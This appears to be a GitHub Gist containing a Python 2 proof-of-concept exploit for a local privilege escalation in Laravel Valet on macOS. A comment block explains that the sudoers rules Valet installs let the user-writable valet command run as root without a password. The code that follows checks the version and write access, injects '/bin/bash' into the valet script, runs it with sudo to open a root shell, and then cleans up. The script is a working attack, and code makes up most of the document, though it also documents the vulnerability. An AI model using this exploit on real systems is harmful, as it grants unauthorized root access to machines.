Last active
April 1, 2018 13:45
-
-
Save leonjza/77b24ce1a1a976428d11e7701510e653 to your computer and use it in GitHub Desktop.
Laravel Valet v1.1.4 - 2.0.3 & v2.0.7+ Local Privilege Escalation (macOS)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS) | |
| # February 2017 - @leonjza | |
| # Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes. | |
| # Reintroduced in v2.0.7 via the 'trust' command again. | |
| # This bug got introduced when the sudoers files got added around | |
| # commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1]. | |
| # Effectively, when the valet command is installed, composer will symlink [2] | |
| # the `valet` command to /usr/local/bin. This 'command' is writable by the user | |
| # that installed it. | |
| # | |
| # ~ $ ls -lah $(which valet) | |
| # lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet | |
| # Running `valet install`, will start the install [3] routine. The very first action | |
| # taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which | |
| # will prompt the user for the sudo password in the command line. From here (and in fact | |
| # from any point where the valet tool uses sudo) the command can execute further commands | |
| # as root without any further interaction needed by the user. | |
| # With this 'sudo' access, the installer does it thing, and eventually installs two new | |
| # sudoers rules for homebrew[5] and valet[6]. | |
| # ~ $ cat /etc/sudoers.d/* | |
| # Cmnd_Alias BREW = /usr/local/bin/brew * | |
| # %admin ALL=(root) NOPASSWD: BREW | |
| # Cmnd_Alias VALET = /usr/local/bin/valet * | |
| # %admin ALL=(root) NOPASSWD: VALET | |
| # The problem with the sudoers rules now is the fact that a user controlled script | |
| # (rememeber the valet command is writable to my user?) is allowed to be run with | |
| # root privileges. More conveniently, without a password. So, to trivially privesc | |
| # using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D | |
| # Or, use this lame script you lazy sod. | |
| # | |
| # ~ $ sudo -k | |
| # ~ $ python escalate.py | |
| # * Shell written. Dropping into root shell | |
| # bash-3.2# whoami | |
| # root | |
| # bash-3.2# exit | |
| # exit | |
| # * Cleaning up POC from valet command | |
| # [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40 | |
| # [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39 | |
| # [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50 | |
| # [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133 | |
| # [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177 | |
| # [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46 | |
| import os | |
| import subprocess | |
| MIN_VERSION = "1.1.4" | |
| MAX_VERSION = "2.0.3" | |
| POC = "/bin/bash; exit;\n" | |
| def run_shit_get_output(shit_to_run): | |
| return subprocess.Popen(shit_to_run, shell=True, | |
| stderr=subprocess.PIPE, stdout=subprocess.PIPE) | |
| def version_tuple(v): | |
| return tuple(map(int, (v.split(".")))) | |
| def get_valet(): | |
| p = run_shit_get_output('which valet') | |
| lines = ''.join(p.stdout.readlines()) | |
| if 'bin/valet' in lines: | |
| return lines.strip() | |
| return None | |
| def get_valet_version(valet_location): | |
| p = run_shit_get_output(valet_location) | |
| v = p.stdout.read(25) | |
| return v.split("\n")[0].split(" ")[2] | |
| def can_write_to_valet(valet_location): | |
| return os.access(valet_location, os.W_OK) | |
| def cleanup_poc_from_command(command_location): | |
| with open(command_location, 'r') as vc: | |
| command_contents = vc.readlines() | |
| if command_contents[1] == POC: | |
| print('* Cleaning up POC from valet command') | |
| command_contents.pop(1) | |
| with open(command_location, 'w') as vc: | |
| vc.write(''.join(command_contents)) | |
| return | |
| print('* Could not cleanup the valet command. Check it out manually!') | |
| return | |
| def main(): | |
| valet_command = get_valet() | |
| if not valet_command: | |
| print(' * The valet command could not be found. Bailing!') | |
| return | |
| # get the content so we can check if we already pwnd it | |
| with open(valet_command, 'r') as vc: | |
| command_contents = vc.readlines() | |
| # check that we havent already popped this thing | |
| if command_contents[1] == POC: | |
| print('* Looks like you already pwnd this. Dropping into shell anyways.') | |
| os.system('sudo ' + valet_command) | |
| cleanup_poc_from_command(valet_command) | |
| return | |
| current_version = get_valet_version(valet_command) | |
| # ensure we have a valid, exploitable version | |
| if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \ | |
| or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)): | |
| print(' * Valet version {0} does not have this bug!'.format(current_version)) | |
| return | |
| # check that we can write | |
| if not can_write_to_valet(valet_command): | |
| print('* Cant write to valet command at {0}. Bailing!'.format(valet_command)) | |
| return | |
| # drop the poc line and write the new one | |
| command_contents.insert(1, POC) | |
| with open(valet_command, 'w') as vc: | |
| vc.write(''.join(command_contents)) | |
| print('* Shell written. Dropping into root shell') | |
| # drop in the root shell :D | |
| os.system('sudo ' + valet_command) | |
| cleanup_poc_from_command(valet_command) | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment